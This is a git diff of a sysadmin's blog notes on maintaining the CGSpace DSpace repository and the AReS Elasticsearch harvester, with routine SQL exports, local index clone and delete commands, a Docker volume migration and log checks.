<li>The first request is OK, but the second one is malformed for sure</li>
</ul>
<h2 id="2021-02-24">2021-02-24</h2>
<ul>
<li>Export a list of journals for Peter to look through:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.journal&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
COPY 3345
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.journal&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 3345
</span></span></code></pre></div><ul>
<li>Start a fresh harvesting on AReS because Udana mapped some items today and wants to include them in his report:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Also, I want to include the new series name/number cleanups so it&rsquo;s not a total waste of time</li>
</ul>
<h2 id="2021-02-25">2021-02-25</h2>
<ul>
<li>Hmm the AReS harvest last night seems to have finished successfully, but the number of items is less than I was expecting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 99546,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99546,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>The current items index has 101380 items&hellip; I wonder what happened
<ul>
<li>I started a new indexing</li>
@ -843,9 +843,9 @@ COPY 3345
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,&#34;&#34;)
value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,&#34;&#34;)
</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;)
</span></span></code></pre></div><ul>
<li>This <code>value.partition</code> was new to me&hellip; and it took me a bit of time to figure out whether I needed to escape the parentheses in the issue number or not (no) and how to reference a capture group with <code>value.replace</code></li>
<li>I tried to check the 1095 CIFOR records from last week for duplicates on DSpace Test, but the page says &ldquo;Processing&rdquo; and never loads
<ul>
@ -857,27 +857,27 @@ value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;)
<li>Niroshini from IWMI is still having issues adding WLE subjects to items during the metadata review step in the workflow</li>
<li>It seems the BatchEditConsumer log spam is gone since I applied <a href="https://github.com/ilri/DSpace/pull/462">Atmire&rsquo;s patch</a></li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;BatchEditConsumer should not have been given&#39;</span> dspace.log.2021-02-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*
dspace.log.2021-02-10:5067
dspace.log.2021-02-11:2647
dspace.log.2021-02-12:4231
dspace.log.2021-02-13:221
dspace.log.2021-02-14:0
dspace.log.2021-02-15:0
dspace.log.2021-02-16:0
dspace.log.2021-02-17:0
dspace.log.2021-02-18:0
dspace.log.2021-02-19:0
dspace.log.2021-02-20:0
dspace.log.2021-02-21:0
dspace.log.2021-02-22:0
dspace.log.2021-02-23:0
dspace.log.2021-02-24:0
dspace.log.2021-02-25:0
dspace.log.2021-02-26:0
dspace.log.2021-02-27:0
dspace.log.2021-02-28:0
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;BatchEditConsumer should not have been given&#39;</span> dspace.log.2021-02-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*
</span></span><span style="display:flex;"><span>dspace.log.2021-02-10:5067
</span></span><span style="display:flex;"><span>dspace.log.2021-02-11:2647
</span></span><span style="display:flex;"><span>dspace.log.2021-02-12:4231
</span></span><span style="display:flex;"><span>dspace.log.2021-02-13:221
</span></span><span style="display:flex;"><span>dspace.log.2021-02-14:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-15:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-16:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-17:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-18:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-19:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-20:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-21:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-22:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-23:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-24:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-25:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-26:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-27:0
</span></span><span style="display:flex;"><span>dspace.log.2021-02-28:0
</span></span></code></pre></div><!-- raw HTML omitted -->

View File

@ -34,7 +34,7 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,19 +163,19 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
<ul>
<li>I looked at the number of connections in PostgreSQL and it&rsquo;s definitely high again:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
1020
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>1020
</span></span></code></pre></div><ul>
<li>I reported it to Atmire to take a look, on the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=851">same issue</a> we had been tracking this before</li>
<li>Abenet asked me to add a new ORCID for ILRI staff member Zoe Campbell</li>
<li>I added it to the controlled vocabulary and then tagged her existing items on CGSpace using my <code>add-orcid-identifier.py</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-03-04-add-zoe-campbell-orcid.csv
dc.contributor.author,cg.creator.identifier
&#34;Campbell, Zoë&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
&#34;Campbell, Zoe A.&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-03-04-add-zoe-campbell-orcid.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Campbell, Zoë&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
</span></span><span style="display:flex;"><span>&#34;Campbell, Zoe A.&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>I still need to do cleanup on the journal articles metadata
<ul>
<li>Peter sent me some cleanups but I can&rsquo;t use them in the search/replace format he gave</li>
@ -183,9 +183,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT dspace_object_id AS id, text_value as &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
COPY 32087
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT dspace_object_id AS id, text_value as &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 32087
</span></span></code></pre></div><ul>
<li>I used OpenRefine to remove all journal values that didn&rsquo;t have one of these values: ; ( )
<ul>
<li>Then I cloned the <code>cg.journal</code> field to <code>cg.volume</code> and <code>cg.issue</code></li>
@ -193,10 +193,10 @@ COPY 32087
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">value.partition(&#39;;&#39;)[0].trim() # to get journal names
value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,&#34;$1&#34;) # to get journal volumes
value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;) # to get journal issues
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.partition(&#39;;&#39;)[0].trim() # to get journal names
</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,&#34;$1&#34;) # to get journal volumes
</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;) # to get journal issues
</span></span></code></pre></div><ul>
<li>Then I uploaded the changes to CGSpace using <code>dspace metadata-import</code></li>
<li>Margarita from CCAFS was asking about an error deleting some items that were showing up in Google and should have been private
<ul>
@ -233,14 +233,14 @@ value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;) # t
<ul>
<li>I migrated the Docker bind mount for the AReS Elasticsearch container to a Docker volume:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker-compose -f docker/docker-compose.yml down
$ docker volume create docker_esData_7
$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
$ docker rm es_dummy
# edit docker/docker-compose.yml to switch from bind mount to volume
$ docker-compose -f docker/docker-compose.yml up -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
</span></span><span style="display:flex;"><span>$ docker volume create docker_esData_7
</span></span><span style="display:flex;"><span>$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
</span></span><span style="display:flex;"><span>$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
</span></span><span style="display:flex;"><span>$ docker rm es_dummy
</span></span><span style="display:flex;"><span># edit docker/docker-compose.yml to switch from bind mount to volume
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml up -d
</span></span></code></pre></div><ul>
<li>The trick is that when you create a volume like &ldquo;myvolume&rdquo; from a <code>docker-compose.yml</code> file, Docker will create it with the name &ldquo;docker_myvolume&rdquo;
<ul>
<li>If you create it manually on the command line with <code>docker volume create myvolume</code> then the name is literally &ldquo;myvolume&rdquo;</li>
@ -249,39 +249,39 @@ $ docker-compose -f docker/docker-compose.yml up -d
<li>I still need to make the changes to git master and add these notes to the pull request so Moayad and others can benefit</li>
<li>Delete the <code>openrxv-items-temp</code> index to test a fresh harvesting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><h2 id="2021-03-05-1">2021-03-05</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><h2 id="2021-03-05-1">2021-03-05</h2>
<ul>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 101761,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 101761,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Set the current items index to read only and make a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
</span></span></code></pre></div><ul>
<li>Delete the current items index and clone the temp one to it:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span></code></pre></div><ul>
<li>Then delete the temp and backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
{&#34;acknowledged&#34;:true}%
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-05&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-05&#39;</span>
</span></span></code></pre></div><ul>
<li>I made some pull requests to OpenRXV:
<ul>
<li><a href="https://github.com/ilri/OpenRXV/pull/86">docker/docker-compose.yml: Use docker volumes</a></li>
@ -298,57 +298,57 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>
<li>But on AReS production <code>openrxv-items</code> has somehow become a concrete index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>
<li>I fixed the issue on production by cloning the <code>openrxv-items</code> index to <code>openrxv-items-final</code>, deleting <code>openrxv-items</code>, and then re-creating it as an alias:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span></code></pre></div><ul>
<li>Delete backups and remove read-only mode on <code>openrxv-items</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-07&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-07&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>
<li>Linode sent alerts about the CPU usage on CGSpace yesterday and the day before
<ul>
<li>Looking in the logs I see a few IPs making heavy usage on the REST API and XMLUI:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E <span style="color:#e6db74">&#39;0[56]/Mar/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E <span style="color:#e6db74">&#39;0[56]/Mar/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</span></span></code></pre></div><ul>
<li>I see the usual IPs for CCAFS and ILRI importer bots, but also <code>143.233.242.132</code> which appears to be for GARDIAN:</li>
</ul>
